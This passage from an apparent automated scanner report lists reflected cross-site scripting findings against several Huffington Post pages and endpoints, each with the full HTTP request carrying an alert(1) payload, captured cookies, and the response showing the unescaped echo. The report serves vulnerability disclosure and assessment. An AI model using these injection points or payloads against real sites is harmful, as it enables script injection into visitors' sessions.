__qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 256534
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'media';
   HPConfig.current_vertical_id = 4;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

5.191. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/osama-bin-laden-pictures_n_857568.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0d5c"-alert(1)-"6cd81aa9f7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1304575105; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; s_pers=%20s_getnr%3D1304575170358-New%7C1367647170358%3B%20s_nrgvo%3DNew%7C1367647170363%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Breaking%25252520News%25252520and%25252520Opinion%25252520on%25252520The%25252520Huffington%25252520Post%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 279986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

5.192. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/ads/check_flights.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e44cb<img src=a onerror=alert(1)>247063d742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_/e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742flex HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:42 GMT
Connection: close
Content-Length: 86

{"result":false,"spot":"right_rail_\/e44cb<img src=a onerror=alert(1)>247063d742flex"}

5.193. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/ads/check_flights.php

Issue detail

The value of the spot request parameter is copied into the HTML document as plain text between tags. The payload 4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 was submitted in the spot parameter. This input was echoed as 4f9ed<img src=a onerror=alert(1)>7efda56f1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_flex4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:40 GMT
Connection: close
Content-Length: 85

{"result":false,"spot":"right_rail_flex4f9ed<img src=a onerror=alert(1)>7efda56f1f4"}

5.194. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/advertise/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3503"-alert(1)-"679e429de31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertise/?c3503"-alert(1)-"679e429de31=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 96474
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=159
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<script>
ad_ears_on = true;

</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
ble_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/advertise/?c3503"-alert(1)-"679e429de31=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

5.195. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/badge/badges_json_v2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 27f4c<script>alert(1)</script>ea4f1e5950b was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:43 GMT
Connection: close
Content-Length: 5901

window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"
...[SNIP]...

5.196. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/badge/badges_json_v2.php

Issue detail

The value of the gn request parameter is copied into the HTML document as plain text between tags. The payload 7d045<img%20src%3da%20onerror%3dalert(1)>df834abc014 was submitted in the gn parameter. This input was echoed as 7d045<img src=a onerror=alert(1)>df834abc014 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_17d045<img%20src%3da%20onerror%3dalert(1)>df834abc014&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:42 GMT
Connection: close
Content-Length: 5904

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_17d045<img src=a onerror=alert(1)>df834abc014","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against Releasing Bin Laden Photos","views_amount"
...[SNIP]...

5.197. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/badge/badges_json_v2.php

Issue detail

The value of the sn request parameter is copied into the HTML document as plain text between tags. The payload 963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3 was submitted in the sn parameter. This input was echoed as 963b6<img src=a onerror=alert(1)>f99a809b4c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:41 GMT
Connection: close
Content-Length: 5924

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous963b6<img src=a onerror=alert(1)>f99a809b4c3"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against
...[SNIP]...

5.198. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/permalink-tracker.html

Issue detail

The value of the vertical request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edefa"%3balert(1)//4a8362f1dd2 was submitted in the vertical parameter. This input was echoed as edefa";alert(1)//4a8362f1dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /permalink-tracker.html?vertical=worldedefa"%3balert(1)//4a8362f1dd2 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=296
Date: Thu, 05 May 2011 01:00:36 GMT
Connection: close
Content-Length: 1352

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js"></script>
</head>
<body>
   
   <script type="text/javascript">
       HPConfig.current_vertical_name = "worldedefa";alert(1)//4a8362f1dd2";
       HPConfig.current_web_address = "www.huffingtonpost.com";
       HPConfig.inst_type = "prod";
       HPConfig.timestamp_for_clearing_js = "1304533217";
   </script>
...[SNIP]...

5.199. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/users/logout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40592"-alert(1)-"6794a9a72f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /users/logout/?40592"-alert(1)-"6794a9a72f1=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82841
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
